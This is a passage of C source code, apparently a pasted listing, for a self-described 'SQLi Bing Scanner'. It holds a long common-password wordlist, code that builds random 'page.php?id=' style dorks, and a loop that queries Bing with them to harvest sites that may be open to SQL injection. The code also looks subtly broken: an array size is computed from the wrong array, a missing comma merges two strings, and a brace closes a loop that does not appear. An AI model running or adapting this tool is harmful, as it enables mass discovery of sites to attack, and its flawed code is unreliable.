  590. "rangers", "raptor", "reality", "redrum", "remote", "reynolds", "rhonda", "ricardo", "ricardo1", "ricky", "river", "roadrunner", "robinhood",
  591. "rocknroll", "rocky1", "ronald", "roxy", "ruthie", "sabrina", "sakura", "sally", "sampson", "samuel", "sandra", "santa", "sapphire", "scarlet",
  592. "scorpio", "scott1", "scottie", "scruffy", "seattle", "serena", "shanti", "shark", "shogun", "simon", "singer", "skull", "skywalker", "slacker",
  593. "smashing", "smiles", "snowflake", "snuffy", "soccer1", "soleil", "sonny", "spanky", "speedy", "spider", "spooky", "stacey", "star69", "start",
  594. "steven1", "stinky", "strawberry", "stuart", "sugar", "sundance", "superfly", "suzanne", "suzuki", "swimmer", "swimming", "system", "taffy",
  595. "tarzan", "teddy", "teddybear", "terry", "theatre", "thunder", "thursday", "tinker", "tootsie", "tornado", "tracy", "tricia", "trident", "trojan",
  596. "truman", "trumpet", "tucker", "turtle", "tyler", "utopia", "voyager", "warcraft", "warlock", "warren", "water", "wayne", "wendy", "williams",
  597. "willy", "winona", "woody", "woofwoof", "wrangler", "wright", "xfiles", "xxxxxx", "yankees", "yvonne", "zebra", "zenith", "zigzag", "zombie",
  598. "zxc123", "zxcvb", "000000", "007007", "11111", "11111111", "123321", "171717", "181818", "1a2b3c", "1chris", "4runner", "54321", "55555", "6969",
  599. "7777777", "789456", "88888888", "Alexis", "Bailey", "Charlie", "Chris", "Daniel", "Dragon", "Elizabeth", "HARLEY", "Heather", "Jennifer",
  600. "Jessica", "Jordan", "KILLER", "Nicholas", "Password", "Princess", "Purple", "Rebecca", "Robert", "Shadow", "Steven", "Summer", "Sunshine",
  601. "Superman", "Taylor", "Thomas", "Victoria", "abcd123", "abcde", "accord", "active", "africa", "airborne", "alfaro", "alicia", "aliens", "alina",
  602. "aline", "alison", "allen", "aloha", "alpha1", "althea", "altima", "amanda1", "amazing", "america", "amour", "anderson", "andre", "andrew1",
  603. "andromeda", "angels", "angie1", "annie", "anything", "apple1", "apple2", "applepie", "april", "aquarius", "ariane", "ariel", "arlene", "artemis",
  604. "asdf1234", "asdfjkl", "ashley1", "ashraf", "ashton", "asterix", "attila", "autumn", "avatar", "babes", "bambi", "barbie", "barney1", "barrett",
  605. "bball", "beaches", "beanie", "beans", "beauty", "becca", "belize", "belle", "belmont", "benji", "benson", "bernardo", "berry", "betsy", "betty",
  606. "bigboss", "bigred", "billy1", "birdie", "birthday", "biscuit", "bitter", "blackjack", "blah", "blanche", "blood", "blowjob", "blowme",
  607. "blueeyes", "blues", "bogart", "bombay", "boobie", "boots", "bootsie", "boxers", "brandi", "brent", "brewster", "bridge", "bronco", "bronte",
  608. "brooke", "brother", "bryan", "bubble", "buddha", "budgie", "burton", "butterfly", "byron", "calendar", "calvin1", "camel", "camille", "campbell",
  609. "camping", "cancer", "canela", "cannon", "carbon", "carnage", "carolyn", "carrot", "cascade", "catfish", "cathy", "catwoman", "cecile", "celica",
  610. "change", "chantal", "charger", "cherry", "chiara", "chiefs", "china", "chris123", "christ1", "christmas", "christopher", "chuck", "cindy1",
  611. "cinema", "civic", "claude", "clueless", "cobain", "cobra", "cody", "colette", "college", "colors", "colt45", "confused", "cool", "corvette",
  612. "cosmo", "country", "crusader", "cunningham", "cupcake", "cynthia", "dagger", "dammit", "dancer", "daphne", "darkstar", "darren", "darryl",
  613. "darwin", "deborah", "december", "deedee", "deeznuts", "delano", "delete", "demon", "denise", "denny", "desert", "deskjet", "detroit", "devil",
  614. "devine", "devon", "dexter", "dianne", "diesel", "director", "dixie", "dodgers", "doggy", "dollar", "dolly", "dominique", "domino", "dontknow",
  615. "doogie", "doudou", "downtown", "dragon1", "driver", "dude", "dudley", "dutchess", "dwight", "eagle1", "easter", "eastern", "edith", "edmund",
  616. "eight", "element", "elissa", "ellen", "elliot", "empire", "enigma", "enterprise", "erin", "escort", "estelle", "eugene", "evelyn", "explore",
  617. "family1", "fatboy", "felipe", "ferguson", "ferret", "ferris", "fireball", "fishes", "fishie", "flight", "florida1", "flowerpot", "forward",
  618. "freddie", "freebird", "freeman", "frisco", "fritz", "froggie", "froggies", "frogs", "fucku", "future", "gabby", "games", "garcia", "gaston",
  619. "gateway", "george1", "georgia", "german", "germany1", "getout", "ghost", "gibson", "giselle", "gmoney", "goblin", "goblue", "gollum", "grandma",
  620. "gremlin", "grizzly", "grumpy", "guess", "guitar1", "gustavo", "haggis", "haha", "hailey", "halloween", "hamilton", "hamlet", "hanna", "hanson",
  621. "happy123", "happyday", "hardcore", "harley1", "harriet", "harris", "harvard", "health", "heart", "heather1", "heather2", "hedgehog", "helene",
  622. "hello1", "hello123", "hellohello", "hermes", "heythere", "highland", "hilda", "hillary", "history", "hitler", "hobbes", "holiday", "holly",
  623. "honda1", "hongkong", "hootie", "horse", "hotrod", "hudson", "hummer", "huskies", "idiot", "iforget", "iloveu", "impact", "indonesia", "irina",
  624. "isabelle", "israel", "italia", "italy", "jackie1", "jacob", "jakey", "james1", "jamesbond", "jamie", "jamjam", "jeffrey1", "jennie", "jenny",
  625. "jensen", "jesse", "jesse1", "jester", "jethro", "jimbob", "jimmy", "joanna", "joelle", "john316", "jordie", "jorge", "josh", "journey", "joyce",
  626. "jubilee", "jules", "julien", "juliet", "junebug", "juniper", "justdoit", "karin", "karine", "karma", "katerina", "katie", "katie1", "kayla",
  627. "keeper", "keller", "kendall", "kenny", "ketchup", "kings", "kissme", "kitten", "kittycat", "kkkkkk", "kristi", "kristine", "labtec", "laddie",
  628. "ladybug", "lance", "laurel", "lawson", "leader", "leland", "lemon", "lester", "letter", "letters", "lexus1", "libra", "lights", "lionel",
  629. "little", "lizzy", "lolita", "lonestar", "longhorn", "looney", "loren", "lorna", "loser", "lovers", "loveyou", "lucia", "lucifer", "lucky14",
  630. "maddie", "madmax", "magic1", "magnum", "maiden", "maine", "management", "manson", "manuel", "marcus", "maria", "marielle", "marine", "marino",
  631. "marshall", "martha", "maxmax", "meatloaf", "medical", "megan", "melina", "memphis", "mermaid", "miami", "michel", "michigan", "mickey1",
  632. "microsoft", "mikael", "milano", "miles", "millenium", "million", "miranda", "miriam", "mission", "mmmmmm", "mobile", "monkey1", "monroe",
  633. "montana", "monty", "moomoo", "moonbeam", "morpheus", "motorola", "movies", "mozart", "munchkin", "murray", "mustang1", "nadia", "nadine",
  634. "napoleon", "nation", "national", "nestle", "newlife", "newyork1", "nichole", "nikita", "nikki", "nintendo", "nokia", "nomore", "normal",
  635. "norton", "noway", "nugget", "number9", "numbers", "nurse", "nutmeg", "ohshit", "oicu812", "omega", "openup", "orchid", "oreo", "orlando",
  636. "packard", "packers", "paloma", "pancake", "panic", "parola", "parrot", "partner", "pascal", "patches", "patriots", "paula", "pauline", "payton",
  637. "peach", "peanuts", "pedro1", "peggy", "perfect", "perry", "peterpan", "philips", "phillips", "phone", "pierce", "pigeon", "pink", "pioneer",
  638. "piper1", "pirate", "pisces", "playboy", "pluto", "poetry", "pontiac", "pookey", "popeye", "prayer", "precious", "prelude", "premier", "puddin",
  639. "pulsar", "pussy", "pussy1", "qwert", "qwerty12", "qwertyui", "rabbit1", "rachelle", "racoon", "rambo", "randy1", "ravens", "redman", "redskins",
  640. "reggae", "reggie", "renee", "renegade", "rescue", "revolution", "richard1", "richards", "richmond", "riley", "ripper", "robby", "roberts",
  641. "rock", "rocket1", "rockie", "rockon", "roger1", "rogers", "roland", "rommel", "rookie", "rootbeer", "rosie", "rufus", "rusty", "ruthless",
  642. "sabbath", "sabina", "safety", "saint", "samiam", "sammie", "sammy", "samsam", "sandi", "sanjose", "saphire", "sarah1", "saskia", "sassy",
  643. "saturday", "science", "scooby", "scoobydoo", "scooter1", "scorpion", "scotty", "scouts", "search", "september", "server", "seven7", "sexy",
  644. "shaggy", "shanny", "shaolin", "shasta", "shayne", "shelly", "sherry", "shirley", "shorty", "shotgun", "sidney", "simba1", "sinatra", "sirius",
  645. "skate", "skipper1", "skyler", "slayer", "sleepy", "slider", "smile1", "smitty", "smoke", "snakes", "snapper", "snoop", "solomon", "sophia",
  646. "space", "sparks", "spartan", "spike1", "sponge", "spurs", "squash", "stargate", "starlight", "stars", "steph1", "steve1", "stevens", "stewart",
  647. "stone", "stranger", "stretch", "strong", "studio", "stumpy", "sucker", "suckme", "sultan", "summit", "sunfire", "sunset", "super", "superstar",
  648. "surfing", "susan1", "sutton", "sweden", "sweetpea", "sweety", "swordfish", "tabatha", "tacobell", "taiwan", "tamtam", "tanner", "target",
  649. "tasha", "tattoo", "tequila", "terry1", "texas", "thankyou", "theend", "thompson", "thrasher", "tiger2", "timber", "timothy", "tinkerbell",
  650. "topcat", "topher", "toshiba", "tototo", "travis", "treasure", "trees", "tricky", "trish", "triton", "trombone", "trouble", "trucker", "turbo",
  651. "twins", "tyler1", "ultimate", "unique", "united", "ursula", "vacation", "valley", "vampire", "vanessa", "venice", "venus", "vermont", "vicki",
  652. "vicky", "victor1", "vincent1", "violet", "violin", "virgil", "virginia", "vision", "volley", "voodoo", "vortex", "waiting", "wanker", "warner",
  653. "water1", "wayne1", "webster", "weezer", "wendy1", "western", "white", "whitney", "whocares", "wildcat", "william1", "wilma", "window",
  654. "winniethepooh", "wolfgang", "wolverine", "wonder", "xxxxxxxx", "yamaha", "yankee", "yogibear", "yolanda", "yomama", "yvette", "zachary",
  655. "zebras", "zxcvbn", "00000000", "121212", "1234qwer", "131313", "13579", "90210", "99999999", "ABC123", "action", "amelie", "anaconda",
  656. "apollo13", "artist", "asshole", "benoit", "bernard", "bernie", "bigbird", "blizzard", "bluesky", "bonjour", "caesar", "cardinal", "carolina",
  657. "cesar", "chandler", "chapman", "charlie1", "chevy", "chiquita", "chocolat", "coco", "cougars", "courtney", "dolphins", "dominic", "donkey",
  658. "dusty", "eminem", "energy", "fearless", "forest", "forever", "glenn", "guinness", "hotdog", "indian", "jared", "jimbo", "johnson", "jojo",
  659. "josie", "kristin", "lloyd", "lorraine", "lynn", "maxime", "memory", "mimi", "mirror", "nebraska", "nemesis", "network", "nigel", "oatmeal",
  660. "patton", "pedro", "planet", "players", "portland", "praise", "psalms", "qwaszx", "raiders", "rambo1", "rancid", "shawn", "shelley", "softball",
  661. "speedo", "sports", "ssssss", "steele", "steph", "stephani", "sunday", "tiffany", "tigre", "toronto", "trixie", "undead", "valentin", "velvet",
  662. "viking", "walker", "watson", "young", "babygirl", "pretty", "hottie", "teamo", "987654321", "naruto", "spongebob", "daniela", "princesa",
  663. "christ", "blessed", "single", "qazwsx", "pokemon", "iloveyou1", "iloveyou2", "fuckyou1", "hahaha", "poop", "blessing", "blahblah", "blink182",
  664. "123qwe", "trinity", "passw0rd", "google", "looking", "spirit", "iloveyou!", "qwerty1", "onelove", "mylove", "222222", "ilovegod", "football1",
  665. "loving", "emmanuel", "1q2w3e4r", "red123", "blabla", "112233", "hallo", "spiderman", "simpsons", "monster", "november", "brooklyn", "poopoo",
  666. "darkness", "159753", "pineapple", "chester", "1qaz2wsx", "drowssap", "monkey12", "wordpass", "q1w2e3r4", "coolness", "11235813", "something",
  667. "alexandra", "estrella", "miguel", "iloveme", "sayang", "princess1", "555555", "999999", "alejandro", "brittany", "alejandra", "tequiero",
  668. "antonio", "987654", "00000", "fernando", "corazon", "cristina", "kisses", "myspace", "rebelde", "babygurl", "alyssa", "mahalkita", "gabriela",
  669. "pictures", "hellokitty", "babygirl1", "angelica", "mahalko", "mariana", "eduardo", "andres", "ronaldo", "inuyasha", "adriana", "celtic",
  670. "samsung", "angelo", "456789", "sebastian", "karina", "hotmail", "0123456789", "barcelona", "cameron", "slipknot", "cutiepie", "50cent", "bonita",
  671. "maganda", "babyboy", "natalie", "cuteako", "javier", "789456123", "123654", "bowwow", "portugal", "777777", "volleyball", "january", "cristian",
  672. "bianca", "chrisbrown", "101010", "sweet", "panget", "benfica", "love123", "lollipop", "camila", "qwertyuiop", "harrypotter", "ihateyou",
  673. "christine", "lorena", "andreea", "charmed", "rafael", "brianna", "aaliyah", "johncena", "lovelove", "gangsta", "333333", "hiphop", "mybaby",
  674. "sergio", "metallica", "myspace1", "babyblue", "badboy", "fernanda", "westlife", "sasuke", "steaua", "roberto", "slideshow", "asdfghjkl",
  675. "santiago", "jayson", "5201314", "jerome", "gandako", "gatita", "babyko", "246810", "sweetheart", "chivas", "alberto", "valeria", "nicole1",
  676. "12345678910", "leonardo", "jayjay", "liliana", "sexygirl", "232323", "amores", "anthony1", "bitch1", "fatima", "miamor", "lover", "lalala",
  677. "252525", "skittles", "colombia", "159357", "manutd", "123456a", "britney", "katrina", "christina", "pasaway", "mahal", "tatiana", "cantik",
  678. "0123456", "teiubesc", "147258369", "natalia", "francisco", "amorcito", "paola", "angelito", "manchester", "mommy1", "147258", "amigos", "marlon",
  679. "linkinpark", "147852", "diego", "444444", "iverson", "andrei", "justine", "frankie", "pimpin", "fashion", "bestfriend", "england", "hermosa",
  680. "456123", "102030", "sporting", "hearts", "potter", "iloveu2", "number1", "212121", "truelove", "jayden", "savannah", "hottie1", "ganda",
  681. "scotland", "ilovehim", "shakira", "estrellita", "brandon1", "sweets", "familia", "love12", "omarion", "monkeys", "loverboy", "elijah", "ronnie",
  682. "mamita", "999999999", "broken", "rodrigo", "westside", "mauricio", "amigas", "preciosa", "shopping", "flores", "isabella", "martinez", "elaine",
  683. "friendster", "cheche", "gracie", "connor", "valentina", "darling", "santos", "joanne", "fuckyou2", "pebbles", "sunshine1", "gangster", "gloria",
  684. "darkangel", "bettyboop", "jessica1", "cheyenne", "dustin", "iubire", "a123456", "purple1", "bestfriends", "inlove", "batista", "karla", "chacha",
  685. "marian", "sexyme", "pogiako", "jordan1", "010203", "daddy1", "daddysgirl", "billabong", "pinky", "erika", "skater", "nenita", "tigger1",
  686. "gatito", "lokita", "maldita", "buttercup", "bambam", "glitter", "123789", "sister", "zacefron", "tokiohotel", "loveya", "lovebug", "bubblegum",
  687. "marissa", "cecilia", "lollypop", "nicolas", "puppies", "ariana", "chubby", "sexybitch", "roxana", "mememe", "susana", "baller", "hotstuff",
  688. "carter", "babylove", "angelina", "playgirl", "sweet16", "012345", "bhebhe", "marcos", "loveme1", "milagros", "lilmama", "beyonce", "lovely1",
  689. "catdog", "armando", "margarita", "151515", "loves", "202020", "gerard", "undertaker", "amistad", "capricorn", "delfin", "cheerleader",
  690. "password2", "PASSWORD", "lizzie", "matthew1", "enrique", "badgirl", "141414", "dancing", "cuteme", "amelia", "skyline", "angeles", "janine",
  691. "carlitos", "justme", "legolas", "michelle1", "cinderella", "jesuschrist", "ilovejesus", "tazmania", "tekiero", "thebest", "princesita", "lucky7",
  692. "jesucristo", "buddy1", "regina", "myself", "lipgloss", "jazmin", "rosita", "chichi", "pangit", "mierda", "741852963", "hernandez", "arturo",
  693. "silvia", "melvin", "celeste", "pussycat", "gorgeous", "honeyko", "mylife", "babyboo", "loveu", "lupita", "panthers", "hollywood", "alfredo",
  694. "musica", "hawaii", "sparkle", "kristina", "sexymama", "crazy", "scarface", "098765", "hayden", "micheal", "242424", "0987654321", "marisol",
  695. "jeremiah", "mhine", "isaiah", "lolipop", "butterfly1", "xbox360", "madalina", "anamaria", "yourmom", "jasmine1", "bubbles1", "beatriz",
  696. "diamonds", "friendship", "sweetness", "desiree", "741852", "hannah1", "bananas", "julius", "leanne", "marie1", "lover1", "twinkle", "february",
  697. "bebita", "87654321", "twilight", "imissyou", "pollito", "ashlee", "cookie1", "147852369", "beckham", "simone", "nursing", "torres", "damian",
  698. "123123123", "joshua1", "babyface", "dinamo", "mommy", "juliana", "cassandra", "redsox", "gundam", "0000", "ou812", "dave", "golf", "molson",
  699. "Monday", "newpass", "thx1138", "1", "Internet", "coke", "foobar", "abc", "fish", "fred", "help", "ncc1701d", "newuser", "none", "pat", "dog",
  700. "duck", "duke", "floyd", "guest", "joe", "kingfish", "micro", "sam", "telecom", "test1", "7777", "absolut", "babylon5", "backup", "bill",
  701. "bird33", "deliver", "fire", "flip", "galileo", "gopher", "hansolo", "jane", "jim", "mom", "passwd", "phil", "phish", "porsche911", "rain", "red",
  702. "sergei", "training", "truck", "video", "volvo", "007", "1969", "5683", "Bond007", "Friday", "Hendrix", "October", "Taurus", "aaa", "alexandr",
  703. "catalog", "challenge", "clipper", "coltrane", "cyrano", "dan", "dawn", "dean", "deutsch", "dilbert", "e-mail", "export", "ford", "fountain",
  704. "fox", "frog", "gabriell", "garlic", "goforit", "grateful", "hoops", "lady", "ledzep", "lee", "mailman", "mantra", "market", "mazda1", "metallic",
  705. "ncc1701e", "nesbitt", "open", "pete", "quest", "republic", "research", "supra", "tara", "testing", "xanadu", "xxxx", "zaphod", "zeus", "0007",
  706. "1022", "10sne1", "1973", "1978", "2000", "2222", "3bears", "Broadway", "Fisher", "Jeanne", "Killer", "Knight", "Master", "Pepper", "Sierra",
  707. "Tennis", "abacab", "abcd", "ace", "acropolis", "amy", "anders", "avenir", "basil", "bass", "beer", "ben", "bliss", "blowfish", "boss", "bridges",
  708. "buck", "bugsy", "bull", "cannondale", "canon", "catnip", "chip", "civil", "content", "cook", "cordelia", "crack1", "cyber", "daisie", "dark1",
  709. "database", "deadhead", "denali", "depeche", "dickens", "emmitt", "entropy", "farout", "farside", "feedback", "fidel", "firenze", "fish1",
  710. "fletch", "fool", "fozzie", "fun", "gargoyle", "gasman", "gold", "graphic", "hell", "image", "intern", "intrepid", "jeff", "jkl123", "joel",
  711. "johanna1", "kidder", "kim", "king", "kirk", "kris", "lambda", "leon", "logical", "lorrie", "major", "mariner", "mark1", "max", "media", "merlot",
  712. "midway", "mine", "mmouse", "moon", "mopar", "mortimer", "nermal", "nina", "olsen", "opera", "overkill", "pacers", "packer", "picard", "polar",
  713. "polo", "primus", "prometheus", "public", "radio", "rastafarian", "reptile", "rob", "robotech", "rodeo", "rolex", "rouge", "roy", "ruby",
  714. "salasana", "scarecrow", "scout", "scuba1", "sergey", "skibum", "skunk", "sound", "starter", "sting1", "sunbird", "tbird", "teflon", "temporal",
  715. "terminal", "the", "thejudge", "time", "toby", "today", "tokyo", "tree", "trout", "vader", "val", "valhalla", "windsurf", "wolf", "wolf1",
  716. "xcountry", "yoda", "yukon", "1213", "1214", "1225", "1313", "1818", "1975", "1977", "1991", "1kitty", "2001", "2020", "2112", "2kids", "333",
  717. "4444", "5050", "57chevy", "7dwarfs", "Animals", "Ariel", "Bismillah", "Booboo", "Boston", "Carol", "Computer", "Creative", "Curtis", "Denise",
  718. "Eagles", "Esther", "Fishing", "Freddy", "Gandalf", "Golden", "Goober", "Hacker", "Harley", "Henry", "Hershey", "Jackson", "Jersey", "Joanna",
  719. "Johnson", "Katie", "Kitten", "Liberty", "Lindsay", "Lizard", "Madeline", "Margaret", "Maxwell", "Money", "Monster", "Pamela", "Peaches", "Peter",
  720. "Phoenix", "Piglet", "Pookie", "Rabbit", "Raiders", "Random", "Russell", "Sammy", "Saturn", "Skeeter", "Smokey", "Sparky", "Speedy", "Sterling",
  721. "Theresa", "Thunder", "Vincent", "Willow", "Winnie", "Wolverine", "aaaa", "aardvark", "abbott", "acura", "admin", "admin1", "adrock", "aerobics",
  722. "agent", "airwolf", "ali", "alien", "allegro", "allstate", "altamira", "altima1", "andrew!", "ann", "anne", "anneli", "aptiva", "arrow",
  723. "asdf;lkj", "assmunch", "baraka", "barnyard", "bart", "bartman", "beasty", "beavis1", "bebe", "belgium", "beowulf", "beryl", "best", "bharat",
  724. "bichon", "bigal", "biker", "bilbo", "bills", "bimmer", "biochem", "birdy", "blinds", "blitz", "bluejean", "bogey", "bogus", "boulder", "bourbon",
  725. "boxer", "brain", "branch", "britain", "broker", "bucks", "buffett", "bugs", "bulls", "burns", "buzz", "c00per", "calgary", "camay", "carl",
  726. "cat", "cement", "cessna", "chad", "chainsaw", "chameleon", "chang", "chess", "chinook", "chouette", "chronos", "cicero", "circuit", "cirque",
  727. "cirrus", "clapton", "clarkson", "class", "claudel", "cleo", "cliff", "clock", "color", "comet", "concept", "concorde", "coolbean", "corky",
  728. "cornflake", "corwin", "cows", "crescent", "cross", "crowley", "cthulhu", "cunt", "current", "cutlass", "daedalus", "dagger1", "daily", "dale",
  729. "dana", "daytek", "dead", "decker", "dharma", "dillweed", "dipper", "disco", "dixon", "doitnow", "doors", "dork", "doug", "dutch", "effie",
  730. "ella", "elsie", "engage", "eric1", "ernie1", "escort1", "excel", "faculty", "fairview", "faust", "fenris", "finance", "first", "fishhead",
  731. "flanders", "fleurs", "flute", "flyboy", "flyer", "franka", "frederic", "free", "front242", "frontier", "fugazi", "funtime", "gaby", "gaelic",
  732. "gambler", "gammaphi", "garfunkel", "garth", "gary", "gateway2", "gator1", "gibbons", "gigi", "gilgamesh", "goat", "godiva", "goethe", "gofish",
  733. "good", "gramps", "gravis", "gray", "greed", "greg", "greg1", "greta", "gretzky", "guido", "gumby", "h2opolo", "hamid", "hank", "hawkeye1",
  734. "health1", "hello8", "help123", "helper", "homerj", "hoosier", "hope", "huang", "hugo", "hydrogen", "ib6ub9", "insight", "instructor", "integral",
  735. "iomega", "iris", "izzy", "jazz", "jean", "jeepster", "jetta1", "joanie", "josee", "joy", "julia2", "jumbo", "jump", "justice4", "kalamazoo",
  736. "kali", "kat", "kate", "kerala", "kids", "kiwi", "kleenex", "kombat", "lamer", "laser", "laserjet", "lassie1", "leblanc", "legal", "leo", "life",
  737. "lions", "liz", "logger", "logos", "loislane", "loki", "longer", "lori", "lost", "lotus", "lou", "macha", "macross", "madoka", "makeitso",
  738. "mallard", "marc", "math", "mattingly", "mechanic", "meister", "mercer", "merde", "merrill", "michal", "michou", "mickel", "minou", "mobydick",
  739. "modem", "mojo", "montana3", "montrose", "motor", "mowgli", "mulder1", "muscle", "neil", "neutrino", "newaccount", "nicklaus", "nightshade",
  740. "nightwing", "nike", "none1", "nopass", "nouveau", "novell", "oaxaca", "obiwan", "obsession", "orville", "otter", "ozzy", "packrat", "paint",
  741. "papa", "paradigm", "pass", "pavel", "peterk", "phialpha", "phishy", "piano1", "pianoman", "pianos", "pipeline", "plato", "play", "poetic",
  742. "print", "printing", "provider", "qqq111", "quebec", "qwer", "racer", "racerx", "radar", "rafiki", "raleigh", "rasta1", "redcloud", "redfish",
  743. "redwing", "redwood", "reed", "rene", "reznor", "rhino", "ripple", "rita", "robocop", "robotics", "roche", "roni", "rossignol", "rugger",
  744. "safety1", "saigon", "satori", "saturn5", "schnapps", "scotch", "scuba", "secret3", "seeker", "services", "sex", "shanghai", "shazam", "shelter",
  745. "sigmachi", "signal", "signature", "simsim", "skydive", "slick", "smegma", "smiths", "smurfy", "snow", "sober1", "sonics", "sony", "spazz",
  746. "sphynx", "spock", "spoon", "spot", "sprocket", "starbuck", "steel", "stephi", "sting", "stocks", "storage", "strat", "strato", "stud",
  747. "student2", "susanna", "swanson", "swim", "switzer", "system5", "t-bone", "talon", "tarheel", "tata", "tazdevil", "tester", "testtest",
  748. "thisisit", "thorne", "tightend", "tim", "tom", "tool", "total", "toucan", "transfer", "transit", "transport", "trapper", "trash", "trophy",
  749. "tucson", "turbo2", "unity", "upsilon", "vedder", "vette", "vikram", "virago", "visual", "volcano", "walden", "waldo", "walleye", "webmaster",
  750. "wedge", "whale1", "whit", "whoville", "wibble", "will", "wombat1", "word", "world", "x-files", "xxx123", "zack", "zepplin", "zoltan", "zoomer",
  751. "123go", "21122112", "5555", "911", "FuckYou", "Fuckyou", "Gizmo", "Hello", "Michel", "Qwerty", "Windows", "angus", "aspen", "ass", "bird",
  752. "booster", "byteme", "cats", "changeit", "christia", "christoph", "classroom", "cloclo", "corrado", "dasha", "fiction", "french1", "fubar",
  753. "gator", "gilles", "gocougs", "hilbert", "hola", "home", "judy", "koko", "lulu", "mac", "macintosh", "mailer", "mars", "meow", "ne1469", "niki",
  754. "paul", "politics", "pomme", "property", "ruth", "sales", "salut", "scrooge", "skidoo", "spain", "surf", "sylvie", "symbol", "forum", "rotimi",
  755. "god", "saved", "2580", "1998", "xxx", "1928", "777", "info", "a", "netware", "sun", "tech", "doom", "mmm", "one", "ppp", "1911", "1948", "1996",
  756. "5252", "Champs", "Tuesday", "bach", "crow", "don", "draft", "hal9000", "herzog", "huey", "jethrotull", "jussi", "mail", "miki", "nicarao",
  757. "snowski", "1316", "1412", "1430", "1952", "1953", "1955", "1956", "1960", "1964", "1qw23e", "22", "2200", "2252", "3010", "3112", "4788", "6262",
  758. "Alpha", "Bastard", "Beavis", "Cardinal", "Celtics", "Cougar", "Darkman", "Figaro", "Fortune", "Geronimo", "Hammer", "Homer", "Janet", "Mellon",
  759. "Merlot", "Metallic", "Montreal", "Newton", "Paladin", "Peanuts", "Service", "Vernon", "Waterloo", "Webster", "aki123", "aqua", "aylmer", "beta",
  760. "bozo", "car", "chat", "chinacat", "cora", "courier", "dogbert", "eieio", "elina1", "fly", "funguy", "fuzz", "ggeorge", "glider1", "gone", "hawk",
  761. "heikki", "histoire", "hugh", "if6was9", "ingvar", "jan", "jedi", "jimi", "juhani", "khan", "lima", "midvale", "neko", "nesbit", "nexus6",
  762. "nisse", "notta1", "pam", "park", "pole", "pope", "pyro", "ram", "reliant", "rex", "rush", "seoul", "skip", "stan", "sue", "suzy", "tab", "testi",
  763. "thelorax", "tika", "tnt", "toto1", "tre", "wind", "x-men", "xyz", "zxc", "369", "Abcdef", "Asdfgh", "Changeme", "NCC1701", "Zxcvbnm", "demo",
  764. "doom2", "e", "good-luck", "homebrew", "m1911a1", "nat", "ne1410s", "ne14a69", "zhongguo", "sample123", "0852", "basf", "OU812", "!@#$%",
  765. "informix", "majordomo", "news", "temp", "trek", "!@#$%^", "!@#$%^&*", "Pentium", "Raistlin", "adi", "bmw", "law", "m", "new", "opus", "plus",
  766. "visa", "www", "y", "zzz", "1332", "1950", "3141", "3533", "4055", "4854", "6301", "Bonzo", "ChangeMe", "Front242", "Gretel", "Michel1", "Noriko",
  767. "Sidekick", "Sverige", "Swoosh", "Woodrow", "aa", "ayelet", "barn", "betacam", "biz", "boat", "cuda", "doc", "hal", "hallowell", "haro",
  768. "hosehead", "i", "ilmari", "irmeli", "j1l2t3", "jer", "kcin", "kerrya", "kissa2", "leaf", "lissabon", "mart", "matti1", "mech", "morecats",
  769. "paagal", "performa", "prof", "ratio", "ship", "slip", "stivers", "tapani", "targas", "test2", "test3", "tula", "unix", "user1", "xanth", "!@#$%^&"
  770. "1701d", "@#$%^&", "Qwert", "allo", "dirk", "go", "newcourt", "nite", "notused", "sss"
  771. };
  772.                 char *param[]={
  773.         "id", "cid", "cat", "pid", "ref", "type", "dir",
  774.         };
  775.         char dork[1024];
  776.                 srand(time(NULL));
  777.                 sprintf_s(dork, 1024, "%s.php?%s=",page_name[rand() % (sizeof(page_name) / sizeof(param[0]))], param[rand() % (sizeof(param) / sizeof(param[0]))]  );
  778.                 int pages = 5;
  779.                         for(int x = 0; x < pages; x++ )
  780.                         {
  781.                                 char bing_url[1024];   // /search?q=%s&first=%d1
  782.                                 sprintf_s(bing_url, 1024, "/search?q=%s&first=%d1",dork, x );
  783.                                 connect_bing(bing_url);
  784.                         }
  785.         } // end of while(1)
  786.         return 0;
  787. }
  788.  
  789. //////////////////////////////////////////////////////
  790. int main(){
  791.         printf("\t\t ############################################\n");
  792.         printf("\t\t ########## SQLi Bing Scanner v1.0 ##########\n");
  793.         printf("\t\t ############################################\n");
  794.         printf("\t\t\t\t thebuzis@live.com\n\n");
  795.         printf("[+] Scanner Starting..\n");
  796.  
  797.         create_bing_url();
  798.        
  799.         return 0;
  800. }
  801. //////////////////////////////////////////////////////